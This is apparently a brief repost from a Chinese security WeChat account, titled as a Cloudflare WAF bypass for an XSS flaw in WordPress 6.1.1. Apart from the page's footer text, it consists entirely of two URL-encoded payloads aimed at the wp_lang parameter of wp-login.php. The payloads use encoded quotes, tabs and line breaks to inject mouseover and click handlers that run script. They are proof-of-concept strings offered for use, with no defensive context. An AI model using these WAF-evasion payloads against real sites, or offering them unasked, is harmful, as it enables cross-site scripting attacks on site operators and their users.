Payload1:
/wp-login.php?wp_lang=en_US%27accesskey%3DX%20Only=1%20%09%20%0A%0D%09On%3C%3EMouseOver%3Dalert(1)//as
Payload2:
%27accesskey%3DX%20Only=1%20%09%20%0A%0D%09On%3C%3EClick%3Dalert(1)/
原文始发于微信公众号(Khan安全攻防实验室):Cloudflare WAF Bypass WordPress 6.1.1 XSS漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论